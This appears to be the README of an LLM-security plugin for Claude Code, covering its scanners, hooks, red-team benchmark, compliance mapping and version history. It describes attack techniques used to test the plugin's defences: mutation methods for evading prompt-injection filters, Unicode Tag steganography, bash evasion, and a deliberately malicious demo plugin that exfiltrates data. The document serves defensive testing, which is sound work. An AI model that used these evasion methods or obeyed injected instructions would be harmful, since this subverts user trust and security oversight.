norwegian-context.md Norwegian regulatory landscape — Datatilsynet, NSM, Digitaliseringsdirektoratet guidance for AI security
prompt-injection-research-2025-2026.md 7 research papers (2025-2026) with implications for hook defenses
deepmind-agent-traps.md DeepMind AI Agent Traps — 6 categories, 43 techniques, coverage matrix
attack-scenarios.json 64 red-team scenarios across 12 categories for attack simulation
attack-mutations.json Synonym tables and mutation rules for adaptive red-team testing
typosquat-allowlist.json Allowlisted package names to reduce false positives in typosquatting detection
ide-extension-threat-patterns.md 10 IDE-extension detection categories (VS Code + JetBrains) with 2024-2026 case studies (GlassWorm, WhiteCobra, TigerJack, Material Theme)
top-vscode-extensions.json Top ~100 VS Code Marketplace extension IDs (Levenshtein typosquat seed) + blocklist of known-malicious publisher.name entries

Note

All knowledge base content is derived from published OWASP standards and peer-reviewed security research. The knowledge files provide grounding for agent analysis — agents read relevant sections before producing findings.


Compliance & Governance

v6.0.0 adds an enterprise governance layer for standards-aware security operations:

| Capability | Description |
|---|---|
| Compliance Mapping | Maps plugin capabilities to EU AI Act (Art. 9, 15, 17), NIST AI RMF (Map, Measure, Manage, Govern), ISO 42001 (Annex A), and MITRE ATLAS techniques. Posture categories 14-16 assess compliance readiness. |
| Norwegian Context | Regulatory guidance from Datatilsynet (DPIA for AI), NSM (basic security principles), and Digitaliseringsdirektoratet. Relevant for Norwegian public sector AI deployments. |
| SARIF 2.1.0 Output | --format sarif flag on scan/deep-scan produces OASIS SARIF standard output for CI/CD integration (GitHub Advanced Security, Azure DevOps, SonarQube). |
| Structured Audit Trail | JSONL audit events (audit-trail.mjs) with ISO 8601 timestamps, OWASP category tags, and SIEM-ready schema. Configurable via LLM_SECURITY_AUDIT_* env vars. |
| AI-BOM | CycloneDX 1.6 Bill of Materials for AI components: models, MCP servers, plugins, knowledge files, hooks. Generated with llm-security audit-bom <target>. |
| Policy-as-Code | .llm-security/policy.json for distributable hook configuration. Teams can enforce consistent security thresholds without per-developer env var setup. |
| Standalone CLI | node bin/llm-security.mjs scan <target> runs scanners without Claude Code. Subcommands: scan, posture, audit-bom, benchmark. |
| CI/CD Integration | --fail-on <severity> for threshold-based exit codes, --compact for one-liner output. Pipeline templates for GitHub Actions, Azure DevOps, GitLab CI in ci/. Guide: docs/ci-cd-guide.md. |
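To make the --fail-on behaviour concrete, the sketch below shows one way a severity threshold could map to an exit code (exit 1 if any finding is at or above the chosen level). The severity ordering array, the finding shape, and the function name are assumptions for illustration; the actual CLI implementation may be structured differently.

```javascript
// Severity names follow the levels used in this README; the ordering array
// and the { severity } finding shape are assumptions for this sketch.
const SEVERITY_ORDER = ['info', 'low', 'medium', 'high', 'critical'];

function exitCodeFor(findings, failOn) {
  const threshold = SEVERITY_ORDER.indexOf(failOn.toLowerCase());
  if (threshold === -1) throw new Error(`Unknown severity: ${failOn}`);
  // Findings with an unrecognised severity rank as -1 and never trip the gate.
  const hit = findings.some(
    (f) => SEVERITY_ORDER.indexOf(String(f.severity).toLowerCase()) >= threshold
  );
  return hit ? 1 : 0;
}

// Example: a pipeline that should only fail on high or critical findings.
const sample = [{ severity: 'medium' }, { severity: 'low' }];
console.log(exitCodeFor(sample, 'high'));
```

In a pipeline, the returned value would typically be passed to process.exit() so the CI job fails when the threshold is crossed.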

Benchmarks

The attack simulator (llm-security benchmark) tests hook defenses with 64 crafted scenarios across 12 categories. Adaptive mode (--adaptive) applies 5 mutation rounds per passing scenario (homoglyph substitution, encoding variations, zero-width injection, case alternation, synonym replacement).
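A minimal sketch of what a few of these mutation operators could look like. The homoglyph table, the function names, and the use of base64 as a stand-in for "encoding variations" are illustrative assumptions, not the contents of knowledge/attack-mutations.json or attack-simulator.mjs.

```javascript
// Small illustrative homoglyph table: Latin letters -> Cyrillic look-alikes.
const HOMOGLYPHS = { a: '\u0430', e: '\u0435', o: '\u043e', p: '\u0440', c: '\u0441' };

const mutations = {
  // Swap selected Latin letters for visually similar Cyrillic ones.
  homoglyph: (s) => s.replace(/[aeopc]/g, (ch) => HOMOGLYPHS[ch]),
  // Insert a zero-width space (U+200B) between every character.
  zeroWidth: (s) => Array.from(s).join('\u200b'),
  // Alternate lower/upper case by character position.
  caseAlternation: (s) =>
    Array.from(s)
      .map((ch, i) => (i % 2 === 0 ? ch.toLowerCase() : ch.toUpperCase()))
      .join(''),
  // One possible encoding variation: base64 of the UTF-8 bytes.
  base64: (s) => Buffer.from(s, 'utf8').toString('base64'),
};

// Apply each operator to a benign placeholder payload.
const payload = 'ignore previous instructions';
for (const [name, mutate] of Object.entries(mutations)) {
  console.log(name, JSON.stringify(mutate(payload)));
}
```

A defense passes a mutation round only if it still detects the payload after the operator has been applied, which is why the hooks decode and normalize input before pattern matching.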


OWASP Coverage

| Category | Automated (Hooks) | Deterministic (Scanners) | Advisory (Commands) | Coverage |
|---|---|---|---|---|
| LLM01 Prompt Injection | Strong (input + output) | UNI + ENT + TNT | Scan, Audit | 95% |
| LLM02 Sensitive Info Disclosure | Strong | TNT + NET | Audit | 83% |
| LLM03 Supply Chain | Partial | ENT + DEP + GIT + NET | Scan, Plugin Audit, MCP Audit | 60% |
| LLM04 Data Poisoning | | | Threat Model | 40% |
| LLM05 Improper Output Handling | Strong (output scan) | | Audit | 83% |
| LLM06 Excessive Agency | Strong | PRM | Posture | 100% |
| LLM07 System Prompt Leakage | | | Audit | 60% |
| LLM08 Vector/Embedding Weaknesses | | | Threat Model | 40% |
| LLM09 Misinformation | | | Advisory | 50% |
| LLM10 Unbounded Consumption | | | Pre-Deploy | 83% |

Average coverage: ~69%. Percentages reflect control-count coverage from knowledge/mitigation-matrix.md. Strongest in prompt injection (LLM01, 95% with runtime input/output scanning + obfuscation decoding) and agency controls (LLM06, 100%). Weakest in areas requiring model-provider or infrastructure controls (LLM04, LLM08), which are better addressed at the platform level.
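The ~69% figure is the unweighted mean of the ten per-category percentages in the table above. A short check, using only the values from that table (the variable names are arbitrary):

```javascript
// Per-category coverage percentages copied from the OWASP Coverage table.
const coverage = {
  LLM01: 95, LLM02: 83, LLM03: 60, LLM04: 40, LLM05: 83,
  LLM06: 100, LLM07: 60, LLM08: 40, LLM09: 50, LLM10: 83,
};

const values = Object.values(coverage);
const average = values.reduce((sum, v) => sum + v, 0) / values.length;

console.log(average.toFixed(1)); // 69.4
```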


Workflow Examples

1. Pre-Installation Gate

Evaluate a plugin or MCP server before installing it — locally or from a remote repo:

/security scan path/to/plugin          # Quick scan with ALLOW/WARNING/BLOCK verdict
/security plugin-audit path/to/plugin  # Deep trust assessment with Install/Review/Do Not Install
                                       # → Install if both pass, investigate if flagged

# Remote repo — scans without installing (v2.4+)
/security scan https://github.com/org/repo --deep
/security scan https://github.com/org/repo --branch dev --deep
/security plugin-audit https://github.com/org/repo

2. Monthly Security Review

Regular cadence for maintaining security posture:

/security posture                      # 30-second baseline scorecard (16 categories)
/security audit                        # Full audit with A-F grade and action items
                                       # → Fix critical/high findings
/security posture                      # Verify improvement

3. Track Security Over Time

Compare scan results against a stored baseline to see what changed:

/security diff path/to/project         # First run creates baseline, subsequent runs show delta
                                       # → Shows new, resolved, unchanged, and moved findings
/security watch path/to/project        # Continuous: runs diff every 6h via /loop
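The new/resolved/unchanged/moved split can be pictured with the sketch below. It assumes a finding is identified by scanner, title, and file, and that a line shift of up to 3 still counts as unchanged (based on the ±3 fuzzy line matching mentioned in the version history). The finding shape and function names are hypothetical; diff-engine.mjs may fingerprint and categorize differently.

```javascript
const LINE_TOLERANCE = 3; // assumed meaning of the "±3" fuzzy line matching

// Assumed identity of a finding: everything except its line number.
const fingerprint = (f) => `${f.scanner}|${f.title}|${f.file}`;

function categorize(baseline, current) {
  const result = { new: [], resolved: [], unchanged: [], moved: [] };
  const remaining = [...baseline];
  for (const finding of current) {
    const idx = remaining.findIndex((b) => fingerprint(b) === fingerprint(finding));
    if (idx === -1) {
      result.new.push(finding); // no counterpart in the baseline
      continue;
    }
    const [match] = remaining.splice(idx, 1); // consume the matched baseline entry
    const drift = Math.abs(match.line - finding.line);
    (drift <= LINE_TOLERANCE ? result.unchanged : result.moved).push(finding);
  }
  result.resolved = remaining; // baseline findings that no longer appear
  return result;
}

// Illustrative data only.
const baseline = [
  { scanner: 'ENT', title: 'High-entropy string', file: 'a.js', line: 10 },
  { scanner: 'NET', title: 'Suspicious URL', file: 'b.js', line: 5 },
];
const current = [
  { scanner: 'ENT', title: 'High-entropy string', file: 'a.js', line: 12 },
  { scanner: 'UNI', title: 'Zero-width character', file: 'c.md', line: 1 },
];
console.log(categorize(baseline, current));
```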

4. Deep Threat Analysis

For new architectures, major changes, or compliance requirements:

/security threat-model                 # 15-30 min guided STRIDE × MAESTRO session
/security audit                        # Verify current controls against identified threats
/security pre-deploy                   # Pre-deployment checklist before production

5. Remediation

Fix findings from scans and audits:

/security clean path/to/project --dry-run   # Preview fixes without modifying files
/security clean path/to/project             # Auto-fix safe issues, confirm semi-auto, report manual
                                            # → Review semi-auto proposals, handle manual findings

Prompt Injection Showcase (v5.0)

The examples/prompt-injection-showcase/ demonstrates runtime hook detection against 61 attack payloads across 19 categories — from classic instruction overrides to v5.0's Unicode steganography, HITL traps, NL indirection, hybrid P2SQL, and bash evasion techniques. Includes 6 false positive checks.

node examples/prompt-injection-showcase/run-showcase.mjs           # Run all 61 payloads
node examples/prompt-injection-showcase/run-showcase.mjs --verbose # Show hook output

See examples/prompt-injection-showcase/README.md for the full category breakdown.
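For a feel of what bash evasion normalization involves, the following sketch undoes three common tricks (empty quote pairs, backslash-escaped letters, and ${IFS} used as a space) before a command is matched against block rules. It is a simplified illustration with a hypothetical function name, not the logic of lib/bash-normalize.mjs, and it is deliberately lossy: the result is meant for pattern matching only, never for execution.

```javascript
// Simplified normalizer: rewrites evasive spellings into the plain command
// so that a rule such as /rm -rf/ can match. For detection only.
function normalizeBash(cmd) {
  return cmd
    .replace(/\$\{IFS\}/g, ' ')      // ${IFS} word-splitting trick -> plain space
    .replace(/''|""/g, '')           // empty quote pairs: r''m -> rm
    .replace(/\\([A-Za-z])/g, '$1')  // backslash before a letter: r\m -> rm
    .replace(/\s+/g, ' ')            // collapse runs of whitespace
    .trim();
}

console.log(normalizeBash("r''m -rf /"));
console.log(normalizeBash('r\\m${IFS}-rf${IFS}/'));
```

Both calls normalize to the same string, so a single rule can cover every spelling.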


Security Assessment Demo

The examples/malicious-skill-demo/ directory contains a deliberately malicious plugin called "Project Health Dashboard" and a full security assessment produced by the combined LLM + deterministic scanning pipeline.

What it demonstrates: A single plugin that looks like a legitimate project health monitoring tool but embeds attacks across every threat category — prompt injection, data exfiltration, Unicode steganography, typosquatting, taint flows, persistence mechanisms, and more.

Key stats:

  • 85 total findings (24 Critical, 24 High, 20 Medium, 6 Low, 11 Info)
  • Verdict: BLOCK 100/100 — both LLM and deterministic scanners independently maxed the risk score
  • All 9 deterministic scanners active — every scanner found findings
  • 25 LLM findings detecting semantic patterns (social engineering, intent, context normalization)
  • 60 deterministic findings detecting byte-level patterns (entropy, Unicode codepoints, taint flow, Levenshtein distance)

Run it yourself:

# Deterministic scanners only (~5 seconds)
node scanners/scan-orchestrator.mjs examples/malicious-skill-demo/evil-project-health/

# Full LLM-enhanced deep scan (both layers)
/security scan examples/malicious-skill-demo/evil-project-health/ --deep

Key takeaway: A single "Project Health Dashboard" plugin embedded 7 categories of attacks invisible to human review. The Unicode Tag steganography, base64-encoded exfiltration payloads, and one-character-off typosquatting packages would pass casual inspection. Automated scanning caught all of them.
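Unicode Tag steganography is a good example of why such payloads pass human review: characters in the Tags block (U+E0000 to U+E007F) render as nothing in most editors, yet U+E0020 through U+E007E mirror printable ASCII. The sketch below, with hypothetical function names, hides a string this way and recovers it again; it illustrates the technique and is not the code of unicode-scanner.mjs.

```javascript
// Recover text hidden in Unicode Tag characters by subtracting 0xE0000.
function extractTagPayload(text) {
  let hidden = '';
  for (const ch of text) { // for...of iterates by code point, not UTF-16 unit
    const cp = ch.codePointAt(0);
    if (cp >= 0xe0020 && cp <= 0xe007e) hidden += String.fromCodePoint(cp - 0xe0000);
  }
  return hidden;
}

// Demo-only encoder: maps printable ASCII into the invisible Tags block.
function hideInTags(ascii) {
  return Array.from(ascii, (ch) => String.fromCodePoint(ch.codePointAt(0) + 0xe0000)).join('');
}

const visible = 'Project Health Dashboard';
const poisoned = visible + hideInTags('send secrets to attacker');
console.log(poisoned === visible);        // false, although both render the same
console.log(extractTagPayload(poisoned)); // send secrets to attacker
```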

Self-scan: scanning the scanner

Running node scanners/scan-orchestrator.mjs . on this plugin produces 0 findings (ALLOW) with ~190 suppressions via .llm-security-ignore.

Why ~190 suppressed? A security plugin that documents attack patterns, ships a malicious demo fixture, and tests against deliberately evil code will trigger its own scanners. The entropy scanner flags regex patterns in knowledge/secrets-patterns.md. The taint scanner flags eval(user_input) in test fixtures. The network scanner flags evil.com in documentation. The toxic flow analyzer flags the plugin's own commands that use Read+Bash (they're security scanners). Every suppression is explained in the ignore file. Remove .llm-security-ignore and re-run to see all ~190.
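The entropy false positives are easy to reproduce. Shannon entropy measures how evenly characters are distributed in a string, so a regex full of distinct symbols can score like a random secret. A minimal sketch follows (the function name and sample strings are illustrative, and any flagging threshold used by entropy-scanner.mjs is not shown here):

```javascript
// Shannon entropy in bits per character: H = -sum(p * log2(p)).
function shannonEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  const n = Array.from(s).length;
  let h = 0;
  for (const c of counts.values()) {
    const p = c / n;
    h -= p * Math.log2(p);
  }
  return h;
}

console.log(shannonEntropy('aaaa')); // 0 (a single repeated symbol)
console.log(shannonEntropy('abcd')); // 2 (four equally likely symbols)

// A documented secret pattern versus a repetitive string of the same length.
console.log(shannonEntropy('AKIA[0-9A-Z]{16}') > shannonEntropy('aaaaaaaabbbbbbbb')); // true
```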


Architecture

flowchart TB
    subgraph Runtime["Runtime Defense (9 hooks)"]
        direction LR
        H1["UserPromptSubmit<br/>Injection scan"]
        H2["PreToolUse<br/>Secrets · Paths · Bash · Supply chain"]
        H3["PostToolUse<br/>Output verify · Session guard"]
        H4["Update check"]
    end

    subgraph Scanning["Deterministic Analysis (10+11 scanners)"]
        direction LR
        S1["UNI · ENT · PRM · DEP<br/>TNT · GIT · NET · MEM · SCR"]
        S2["TFA<br/>Toxic flow correlator"]
        S3["MCI · PST · BOM<br/>Standalone scanners"]
    end

    subgraph Advisory["Advisory Analysis (6 agents, 19 commands)"]
        direction LR
        A1["Skill Scanner<br/>7 threat categories"]
        A2["MCP Scanner<br/>5-phase analysis"]
        A3["Posture · Audit<br/>16 categories, A-F grade"]
        A4["Threat Model<br/>STRIDE × MAESTRO"]
    end

    subgraph Knowledge["Knowledge Base (16 files)"]
        direction LR
        K1["5 OWASP frameworks"]
        K2["Threat patterns<br/>Skills · MCP · Secrets"]
        K3["Compliance · Research<br/>Registry · Packages"]
    end

    Runtime -->|"blocks/warns in real time"| User["Claude Code Session"]
    User -->|"/security scan"| Scanning
    User -->|"/security audit"| Advisory
    Advisory -.->|"grounded by"| Knowledge
    Scanning -->|"enriches"| Advisory
    S1 -->|"prior results"| S2

Directory Structure

llm-security/
├── .claude-plugin/plugin.json     # Manifest (v6.5.0)
├── CLAUDE.md                      # Plugin documentation
├── README.md                      # This file
├── LICENSE                        # MIT License
├── SECURITY.md                    # Vulnerability disclosure policy
├── package.json                   # type: module, engines, test script, bin field
├── bin/                           # Standalone CLI
│   └── llm-security.mjs          #   node bin/llm-security.mjs scan/posture/audit-bom/benchmark
├── ci/                            # CI/CD pipeline templates
│   ├── github-action.yml          #   GitHub Actions with SARIF upload
│   ├── azure-pipelines.yml        #   Azure DevOps with SARIF upload
│   └── gitlab-ci.yml              #   GitLab CI with SARIF upload
├── docs/                          # Guides
│   └── ci-cd-guide.md             #   CI/CD integration guide (Schrems II, NSM)
├── commands/                      # 18 slash commands
│   ├── security.md                #   Router + quick start
│   ├── scan.md                    #   Supply chain gate (+ --deep, --fail-on, --compact, --format sarif)
│   ├── deep-scan.md               #   Deterministic-only deep scan
│   ├── diff.md                    #   Compare scan against stored baseline
│   ├── watch.md                   #   Continuous monitoring via /loop
│   ├── registry.md                #   Skill signature registry
│   ├── supply-check.md            #   Re-audit installed dependencies
│   ├── clean.md                   #   Scan + remediate (auto/semi-auto/manual)
│   ├── dashboard.md               #   Cross-project security dashboard
│   ├── audit.md                   #   Full project audit
│   ├── plugin-audit.md            #   Plugin trust assessment
│   ├── mcp-audit.md               #   MCP-focused audit (+ --live flag)
│   ├── mcp-inspect.md             #   Live MCP server inspection via JSON-RPC 2.0
│   ├── posture.md                 #   Quick scorecard (16 categories)
│   ├── harden.md                  #   Generate Grade A security config
│   ├── red-team.md                #   Attack simulation (64 scenarios, adaptive mode)
│   ├── threat-model.md            #   Interactive STRIDE/MAESTRO
│   └── pre-deploy.md              #   Deployment checklist
├── agents/                        # 6 specialized agents
│   ├── skill-scanner-agent.md     #   7 threat categories
│   ├── mcp-scanner-agent.md       #   5-phase MCP analysis
│   ├── posture-assessor-agent.md  #   16-category assessment
│   ├── threat-modeler-agent.md    #   STRIDE × MAESTRO interview
│   ├── deep-scan-synthesizer-agent.md # JSON → human-readable report
│   └── cleaner-agent.md           #   Semi-auto remediation proposals
├── scanners/                      # 10 orchestrated + 11 standalone
│   ├── scan-orchestrator.mjs      #   Entry point — runs all 10 orchestrated, outputs JSON
│   ├── posture-scanner.mjs        #   Standalone: 16-category posture assessment, <50ms
│   ├── attack-simulator.mjs       #   Standalone: red-team harness, 64 scenarios, adaptive mode
│   ├── ai-bom-generator.mjs       #   Standalone: CycloneDX 1.6 AI Bill of Materials
│   ├── dashboard-aggregator.mjs   #   Standalone: cross-project dashboard aggregation
│   ├── reference-config-generator.mjs # Standalone: Grade A config generation
│   ├── supply-chain-recheck-cli.mjs #  Standalone: CLI for supply chain re-audit
│   ├── auto-cleaner.mjs           #   Standalone: remediation engine — 16 fix ops, atomic writes
│   ├── content-extractor.mjs      #   Standalone: pre-extracts evidence, strips injection patterns
│   ├── mcp-live-inspect.mjs       #   Standalone: live MCP server inspection via JSON-RPC 2.0
│   ├── watch-cron.mjs             #   Standalone: cron wrapper for background scanning
│   ├── lib/
│   │   ├── severity.mjs           #   Constants, risk score, verdict logic
│   │   ├── string-utils.mjs       #   Entropy, Levenshtein, base64, redact, obfuscation decoders
│   │   ├── injection-patterns.mjs #   Shared prompt injection patterns (21 critical, 8 high, 15 medium)
│   │   ├── output.mjs             #   Finding/result builders, JSON envelope
│   │   ├── diff-engine.mjs        #   Baseline storage, fingerprinting, diff categorization
│   │   ├── skill-registry.mjs     #   Fingerprinting, caching, pattern search
│   │   ├── file-discovery.mjs     #   Walk tree, filter, binary detect
│   │   ├── yaml-frontmatter.mjs   #   Regex-based frontmatter parser
│   │   ├── git-clone.mjs          #   Sandboxed clone/cleanup (sandbox-exec + git config hardening)
│   │   ├── fs-utils.mjs           #   Backup, restore, cleanup, tmppath (UUID-unique) utilities
│   │   ├── bash-normalize.mjs     #   Bash evasion normalization (empty quotes, ${}, backslash)
│   │   ├── supply-chain-data.mjs  #   Shared blocklists and supply chain data
│   │   ├── sarif-formatter.mjs    #   OASIS SARIF 2.1.0 output formatter
│   │   ├── audit-trail.mjs        #   Structured JSONL audit events (ISO 8601, OWASP tags)
│   │   ├── bom-builder.mjs        #   CycloneDX BOM construction
│   │   ├── distribution-stats.mjs #   Statistical analysis (Jensen-Shannon divergence)
│   │   ├── policy-loader.mjs      #   Reads .llm-security/policy.json for distributable config
│   │   └── mcp-description-cache.mjs # MCP tool description caching + drift detection
│   ├── unicode-scanner.mjs        #   Zero-width, Tags, BIDI, homoglyphs
│   ├── entropy-scanner.mjs        #   Shannon entropy, base64/hex detection
│   ├── permission-mapper.mjs      #   Plugin permission analysis
│   ├── dep-auditor.mjs            #   CVE, typosquatting, install scripts
│   ├── taint-tracer.mjs           #   Source-to-sink data flow tracing
│   ├── git-forensics.mjs          #   Rug pull signals, history analysis
│   ├── network-mapper.mjs         #   URL discovery, DNS, domain classification
│   ├── memory-poisoning-scanner.mjs # Injection in CLAUDE.md, memory, rules files
│   ├── supply-chain-recheck.mjs   #   Re-audit installed deps from lockfiles
│   └── toxic-flow-analyzer.mjs    #   Post-processing correlator: lethal trifecta detection
├── hooks/                         # 9 automated hooks
│   ├── hooks.json                 #   Hook registration
│   └── scripts/
│       ├── pre-prompt-inject-scan.mjs # 21 critical + 8 high + 15 medium patterns, obfuscation decode, configurable mode
│       ├── pre-edit-secrets.mjs   #   13 secret patterns, knowledge/ exclusion
│       ├── pre-write-pathguard.mjs #  8 path categories (env, ssh, aws, gnupg, creds, hooks, system, settings)
│       ├── pre-bash-destructive.mjs # 8 block + 6 warn rules, T1-T6 bash-normalize
│       ├── pre-install-supply-chain.mjs # 7 package managers, CVE/typosquat/age-gate
│       ├── pre-compact-scan.mjs   #   PreCompact: scans transcript tail (500 KB) for injection before compaction, mode: block/warn/off
│       ├── post-mcp-verify.mjs    #   Advisory: ALL tools injection scan, Bash secrets/URLs/size
│       ├── post-session-guard.mjs #   Advisory: runtime trifecta detection (sliding window, JSONL state)
│       └── update-check.mjs      #   Informational: version check (1x/24h, cached, disable: LLM_SECURITY_UPDATE_CHECK=off)
├── knowledge/                     # 16 reference files
│   ├── owasp-llm-top10.md
│   ├── owasp-agentic-top10.md
│   ├── owasp-skills-top10.md      #   OWASP Skills Top 10 (AST01-AST10)
│   ├── skill-threat-patterns.md
│   ├── mcp-threat-patterns.md
│   ├── secrets-patterns.md
│   ├── mitigation-matrix.md
│   ├── compliance-mapping.md      #   EU AI Act, NIST AI RMF, ISO 42001, MITRE ATLAS
│   ├── norwegian-context.md       #   Datatilsynet, NSM, Digitaliseringsdirektoratet
│   ├── deepmind-agent-traps.md    #   6 categories, 43 techniques
│   ├── prompt-injection-research-2025-2026.md # 7 research papers
│   ├── attack-scenarios.json      #   64 red-team scenarios across 12 categories
│   ├── attack-mutations.json      #   Synonym tables for adaptive testing
│   ├── typosquat-allowlist.json   #   False positive reduction
│   ├── top-packages.json          #   Top 200 npm + 100 PyPI for typosquatting
│   └── skill-registry.json        #   Seed data for skill signature registry
├── tests/                         # Test suite (node:test, zero external deps)
│   ├── lib/                       #   Unit tests for shared library
│   ├── scanners/                  #   Integration tests against fixture
│   └── fixtures/                  #   Test-specific data (dep-test)
├── reports/                        # Scan reports (.docx + .md source)
│   ├── baselines/                 #   Stored scan baselines for diff comparison
│   └── watch/                     #   Cron scan results (latest.json) + config
├── examples/                      # Demo fixtures
│   └── malicious-skill-demo/      #   Regression test (47+ findings, BLOCK)
└── templates/                     # Report templates (1 unified + archive)
    ├── unified-report.md          #   All 9 analysis types via conditional sections
    └── archive/                   #   9 original templates preserved for reference

~25,400 lines across ~100 active files (+10 archived). Minimal persistent state: scan baselines in reports/baselines/, watch results in reports/watch/, skill registry in reports/skill-registry.json, session guard JSONL in /tmp/, update-check cache in ~/.cache/. All scan outputs generated fresh per invocation.


What This Plugin Does Not Cover

| Area | Why | Alternative |
|---|---|---|
| CLAUDE.md poisoning (post-clone) | Once a repo is cloned, CLAUDE.md loads into the system prompt before any hooks run. No hook-based solution can intercept this after cloning. | This is exactly why you should scan repos remotely before cloning: /security scan https://repo-url --deep analyzes CLAUDE.md and all other files via the pre-extraction layer without ever loading them into your session. Always scan before cloning unknown repos. For repos already cloned: manually review CLAUDE.md before opening with Claude Code. See context-filter for experimental OS-level interposition (macOS only, requires re-signing after Claude Code updates). |
| ML-based injection classification | Regex patterns cannot catch novel phrasings, multilingual injection, or adversarial rephrasing that semantic models can. | Use parry-guard alongside this plugin for DeBERTa/Llama Prompt Guard 2 ML classification. |
| Enterprise SSO/SCIM | Platform-level configuration | Anthropic Admin Console |
| RAG infrastructure | Vector DB / embedding pipeline security | Dedicated RAG security tools |
| LLM gateway/proxy | Network infrastructure | API gateway solutions |
| SIEM integration | Organization security stack | Splunk, Sentinel, etc. |
| Runtime scheming detection | The session guard hook detects lethal trifecta patterns (a known attack sequence), but general scheming, where an agent pursues hidden goals through novel strategies, remains fundamentally hard for any tool. | Session guard provides partial coverage. Full scheming detection requires monitoring + human oversight. |

These gaps are surfaced advisorily through /security threat-model and /security pre-deploy.
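To show what the session guard's "lethal trifecta" check amounts to, and why it cannot see novel scheming, here is a simplified sliding-window sketch. The trifecta legs (access to private data, exposure to untrusted content, ability to communicate externally) are the standard definition; the tool-to-leg mapping, class name, and return value are assumptions for illustration, and post-session-guard.mjs is considerably more nuanced.

```javascript
// Assumed, deliberately crude mapping from tool names to trifecta legs.
// A real classifier would also inspect arguments (which file, which URL).
const LEG_BY_TOOL = {
  Read: 'private_data',
  WebFetch: 'untrusted_content',
  Bash: 'external_comms',
};

class TrifectaWindow {
  constructor(size = 100) { // 100-call window, as in the long-horizon monitor
    this.size = size;
    this.calls = [];
  }

  // Records a tool call; returns true when all three legs are in the window.
  record(toolName) {
    this.calls.push(LEG_BY_TOOL[toolName] ?? null);
    if (this.calls.length > this.size) this.calls.shift(); // drop the oldest call
    const legs = new Set(this.calls.filter(Boolean));
    return legs.size === 3;
  }
}

const guard = new TrifectaWindow();
console.log(guard.record('Read'));     // false
console.log(guard.record('WebFetch')); // false
console.log(guard.record('Bash'));     // true
```

The check only fires on a known combination of capabilities; an agent pursuing a hidden goal through steps that never complete this pattern would pass unnoticed, which is the gap the table describes.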


Complementary Tools

This plugin provides full-stack security hardening (static analysis + supply chain + audit + threat modeling). For organizations wanting defense in depth, these tools cover areas we intentionally leave to specialists:

| Tool | What It Adds | How It Complements |
|---|---|---|
| parry-guard | ML-based prompt injection detection (DeBERTa v3 + Llama Prompt Guard 2 86M) in Rust. Fail-closed: uncertain = unsafe. | Our regex patterns catch known injection signatures. parry-guard catches novel phrasings, multilingual injection, and adversarial rephrasing via semantic ML models. No overlap, no conflict. |
| Lasso claude-hooks | Warn-and-continue PostToolUse hook. 96 patterns across 5 categories. allowManagedHooksOnly for team deployment. | Different philosophy: Lasso warns but never blocks, letting Claude decide with context. Our hooks block critical patterns. Both can run together; hooks execute sequentially. |
| Snyk agent-scan | Commercial skills/MCP scanning with a larger dataset (3,984 skills analyzed). Tool poisoning and shadowing detection. | Our skill-scanner-agent covers the same 7 threat categories. Snyk has a larger training set from scanning the full ClawHub marketplace. Use both for maximum coverage. |

Tip

Recommended combo: llm-security (breadth: static + supply chain + audit + posture + threat modeling) + parry-guard (depth: ML injection classification). They cover different layers with no conflicts.


Compatibility

  • Claude Code: v2.x+
  • Platform: macOS, Linux, Windows (all hooks are Node.js .mjs)
  • Node.js: Required for hook scripts (any recent LTS version)
  • Overlap with claude-code-essentials: Safe to run both. This plugin extends claude-code-essentials with path guarding and MCP verification. Duplicate blocking is harmless — hooks run sequentially.

Version History

Version Date Highlights
6.5.0 2026-04-17 OS sandbox for /security ide-scan <url>. VSIX fetch + extract now runs in a sub-process wrapped by sandbox-exec (macOS) or bwrap (Linux), reusing the same primitives proven by the v5.1 git-clone sandbox. Defense-in-depth — even if lib/zip-extract.mjs ever has a bypass, the kernel refuses any write outside the per-scan temp directory. New: lib/vsix-fetch-worker.mjs (sub-process worker with deterministic JSON-line IPC) and lib/vsix-sandbox.mjs (buildSandboxProfile / buildBwrapArgs / buildSandboxedWorker / runVsixWorker, 35 s timeout, 1 MB stdout cap). New scan(target, { useSandbox }) option (default true for CLI; tests use false since globalThis.fetch mocks do not cross processes). Windows fallback: in-process with meta.warnings advisory. Envelope meta.source.sandbox field: 'sandbox-exec' | 'bwrap' | 'none' | 'in-process'. 1352 tests (was 1344).
6.4.0 2026-04-17 /security ide-scan <url> — pre-install verification. The IDE extension scanner now accepts URLs and fetches the VSIX before scanning. Supported: VS Code Marketplace (https://marketplace.visualstudio.com/items?itemName=publisher.name), OpenVSX (https://open-vsx.org/extension/publisher/name[/version]), and direct .vsix URLs. New libraries: lib/vsix-fetch.mjs (HTTPS-only fetch with 50MB cap, 30s timeout, SHA-256, manual host-whitelisted redirects) and lib/zip-extract.mjs (zero-dep ZIP parser, rejects zip-slip / symlinks / absolute paths / drive letters / encrypted entries / ZIP64; caps: 10 000 entries, 500MB uncompressed, 100x expansion ratio, depth 20). Temp dir always cleaned in try/finally. Envelope meta.source carries { type: "url", kind, url, finalUrl, sha256, size, publisher, name, version }. New knowledge file: marketplace-api-notes.md. GitHub repo URLs intentionally not supported (would require a build step). 1344 tests (was 1296).
6.3.0 2026-04-17 IDE extension prescan. New /security ide-scan command and ide-extension-scanner.mjs (prefix IDE) discover and audit installed VS Code extensions (and forks: Cursor, Windsurf, VSCodium, code-server, Insiders, Remote-SSH; JetBrains is a v1.1 stub). 7 IDE-specific checks: blocklist match, theme-with-code, sideload (.vsix), broad activation (*, onStartupFinished), Levenshtein typosquat ≤2 vs top-100, extension-pack expansion, dangerous vscode:uninstall hooks. Per-extension orchestration of UNI/ENT/NET/TNT/MEM/SCR scanners with bounded concurrency. OS-aware discovery via lib/ide-extension-discovery.mjs (Platform-specific suffix parsing for darwin-x64, linux-arm64, etc.). Offline-first; --online opt-in for future Marketplace/OSV.dev lookups. New knowledge files: ide-extension-threat-patterns.md (10 categories, 2024-2026 case studies from Koi Security — GlassWorm, WhiteCobra, TigerJack, Material Theme), top-vscode-extensions.json (typosquat seed + blocklist), top-jetbrains-plugins.json (stub). 1296 tests (was 1274).
